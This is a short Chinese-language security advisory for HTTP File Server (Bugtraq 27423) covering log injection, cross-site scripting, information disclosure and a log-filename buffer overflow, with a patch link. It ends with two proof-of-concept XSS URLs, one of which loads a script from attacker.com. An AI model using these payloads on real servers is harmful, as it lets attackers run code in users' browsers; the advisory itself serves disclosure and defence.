BUGTRAQ ID: 27423
CVE(CAN) ID: CVE-2008-0405,CVE-2008-0406,CVE-2008-0407,CVE-2008-0408,CVE-2008-0409,CVE-2008-0410
HTTP File Server是用于共享文件的开源HTTP服务器。
HFS没有正确地记录某些输入,用户可以在登陆时伪造用户名将任意内容注入到日志文件中。
HFS没有正确地过滤某些输入便将其返回给了用户,这可能导致在受影响服务器的用户浏览器会话中执行任意HTML和脚本代码。
远程攻击者可以通过向服务器提交包含有模板符号的特制请求导致泄露某些信息,如连接数、传输速度、通讯统计或运行时间等。
HFS没有正确地处理用户名便使用用户名创建日志文件的文件名,这可能允许攻击者通过向服务器提交恶意请求导致创建目录、向文件附加数据,或触发缓冲区溢出。成功攻击允许执行任意代码,但要求使用了%user%模板符号定义日志文件的名称。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&big_mirror=0” target=“_blank”>http://downloads.sourceforge.net/hfs/hfs2.2c.zip?modtime=1201107806&big_mirror=0</a>
http://<script>alert('Syhunt%20XSS')<%2fscript>a:x@[host]/
http://<script>var%20sChar=String%2efromCharCode(58)%3bdocument%2ewrite('<script%20src=http'+sChar+'%2f%2fwww%2eattacker%2ecom%2fxss%2ejs><%5c%2fscript>')